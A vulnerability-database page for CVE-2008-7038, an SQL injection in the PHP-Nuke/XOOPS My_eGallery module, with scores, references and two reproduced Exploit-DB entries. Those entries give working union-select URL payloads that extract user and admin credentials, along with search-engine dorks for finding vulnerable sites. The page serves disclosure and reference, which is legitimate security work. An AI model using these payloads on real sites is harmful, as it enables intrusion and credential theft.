CVE-2008-7038
Published: 2009-08-24
Priority: P3 · 41 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.16% (63.3th percentile)
SQL injection vulnerability in the My_eGallery module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the gid parameter in a showgall action to modules.php. NOTE: this issue was disclosed by an unreliable researcher, so the details might be incorrect.
No detection rules found.
Exploit-DB
XOOPS Module My_eGallery 3.04 - 'gid' SQL Injection
exploitdb·2008-03-12
---
##########################################
#
# XOOPS Module My_eGallery 3.04
#
#download=http://webscripts.softpedia.com/script/Modules/Other-Modules/My-eGallery-dev-8113.html
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/my_egallery"
#
###########################################
EXPLOIT :
modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*
###########################################
##################S@BUN####################
##################################
Exploit-DB
PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection
exploitdb·2008-02-28
---
Aria-Security Team
http://Aria-Security.Net
Shoutz: Aura, Null, imm02tal, Kinglet, and our staff
PHP-Nuke My_eGallery "gid" Remote SQL Injection
Dork: inurl:"modules.php?name=My_eGallery"
modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
The-0utl4w
From Aria-Security.Net
Original Link: http://forum.aria-security.net/showthread.php?p=1490
# milw0rm.com [2008-02-28]
No writeups or analysis indexed.
http://osvdb.org/51021
http://www.securityfocus.com/archive/1/488916/100/100/threaded
http://www.securityfocus.com/bid/28030
https://exchange.xforce.ibmcloud.com/vulnerabilities/40910
https://www.exploit-db.com/exploits/5203
https://www.exploit-db.com/exploits/5242
Published: 2009-08-24